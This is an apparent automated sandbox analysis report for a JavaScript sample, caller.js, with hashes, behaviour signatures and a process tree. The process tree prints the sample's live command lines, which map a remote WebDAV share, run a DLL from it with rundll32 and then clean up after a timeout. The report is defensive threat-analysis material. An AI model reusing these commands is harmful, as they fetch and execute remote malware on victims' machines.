Analysis
-
max time kernel
55s -
max time network
62s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
-
submitted
01-10-2024 18:57
General
-
Target
caller.js
-
Size
1.5MB
-
MD5
93f6ba457cf4546708a88012d0407c6b
-
SHA1
14551a86622b82de8ab6cb3dc17d3583f5210a52
-
SHA256
d8b97079a169acd2113f436bef00a941f1f5d0746d90b0d8ed3f0312d754c18c
-
SHA512
af082054c95ddf920b763947e7cdb78859eb9ca3a0261996dd53b918836d84e5b544a68e1c186fbc36cbd12c238554ef5df352900ad5d80eea513ba1321341d0
-
SSDEEP
24576:0t2TNX+qdOp1w8K9hcxXwcUlINc6i8OmmdLBR92w0WqXJJ15XqcyTdiG0KtX:0t2TNX+qdOpjKzcxXMiNcqSpFS1BMioX
Score
6/10
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\caller.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c net use W: \\5n.si@ssl\tx && C:\Windows\syswow64\rundll32 w:\f\o.dll,%random%%random%2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use W: \\5n.si@ssl\tx3⤵
- Enumerates connected drives
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 180 && net use W: /d /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 1803⤵
- Delays execution with timeout.exe
-
-